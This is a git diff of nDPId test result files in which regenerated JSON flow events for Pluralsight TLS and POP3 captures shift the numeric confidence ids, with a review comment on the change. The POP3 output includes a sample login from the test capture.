{"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359646,"flow_last_seen":1648373359646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359646,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1648373359646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359646,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8yIlAAEAGdgjAqAGAaBHR8K7iAbvIMdGjAAAAAKAC+vD8DgAAAgQFtAQCCArhZSj9AAAAAAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359662,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGRZpoEdHwwKgBgAG7ruI30m4VyDHRpIAS\/\/+CtAAAAgQFeAEBBAIBAwMK"} 01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItyItAAEAGdBXAqAGAaBHR8K7iAbvIMdGkN9JuFlAYAfapQAAAFgMBAgABAAH8AwNnKyM21\/SbS3Q02cIKvbAgcmV67HQB0KXsoOxxl9v++yDRdtN3P07Qel84K9CWVDBxLwdJHbn9d9oomO2+9M0CRgAgenoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAAD4APAAAOXpuNnF6cTZjYWF1Y3VkZXNyLXBsdXJhbHNpZ2h0LnNpdGVpbnRlcmNlcHQucXVhbHRyaWNzLmNvbQAXAAD\/AQABAAAKAAoACLq6AB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApuroAAQAAHQAgm5zCzvNJzsWd1VyD4DXwZiQmlSanX10JAobLY4rSfTUALQACAQEAKwAHBsrKAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAJ4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":44,"total-skipped-flows":0,"total-l4-payload-len":26716,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1648373359681} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 44/44 @@ -55,9 +55,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5922065 bytes -~~ total memory freed........: 5922065 bytes -~~ total allocations/frees...: 118224/118224 +~~ total memory allocated....: 6055699 bytes +~~ total memory freed........: 6055699 bytes +~~ total allocations/frees...: 120986/120986 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1313 chars diff --git a/test/results/pop3.pcap.out b/test/results/pop3.pcap.out index b2142fdb2..a2891ac80 100644 
--- a/test/results/pop3.pcap.out +++ b/test/results/pop3.pcap.out 
@@ -4,8 +4,8 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1349776771892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776771892,"pkt":"ABffs8QAAMCfw1sHCABFEAA8\/wtAAEAGdh2P4eW1StAFHInXAG5gksK3AAAAAKACFtDFsQAAAgQFtAQCCAoAYD28AAAAAAEDAwY="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1349776772030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776772030,"pkt":"AMCfw1sHABffs8QACABFAAA8AABAADUGgDlK0AUcj+HltQBuidcdXnV7YJLCuKASFqDzqQAAAgQFtAQCCApTpKX2AGA9vAEDAwk="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1349776772030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1349776772030,"pkt":"ABffs8QAAMCfw1sHCABFEAA0\/wxAAEAGdiSP4eW1StAFHInXAG5gksK4HV51fIAQAFzFqQAAAQEICgBgPkZTpKX2"} -00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} +00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} 
+00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-payload-len":1853,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1349776799209} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872405 bytes -~~ total memory freed........: 5872405 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6006067 bytes +~~ total memory freed........: 6006067 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 822 chars 
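Review bot: The numeric key under `ndpi.confidence` changes from `"4"` to `"6"` for the same `"DPI"` result in the `detected` and `end` events of this hunk, and the pops.pcapng.out and pps.pcap.out hunks show the same shift. The commit message does not mention it; presumably the bumped libnDPI renumbered its confidence levels. Any consumer, detection rule or dashboard that filters on the numeric id would silently stop matching, so the message should say to match on the string value, e.g. `confidence ids renumbered by libnDPI bump; consumers must key on the name ("DPI"), not the id`. Separately, the regenerated `detected` event still serializes the POP3 `user` and `password` fields in clear under `"pop"`, so the event stream and anything that stores it should be documented as credential-bearing and access-controlled or redacted downstream.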
diff --git a/test/results/pops.pcapng.out b/test/results/pops.pcapng.out index 81c3dd0ad..993b715e4 100644 --- a/test/results/pops.pcapng.out +++ b/test/results/pops.pcapng.out 
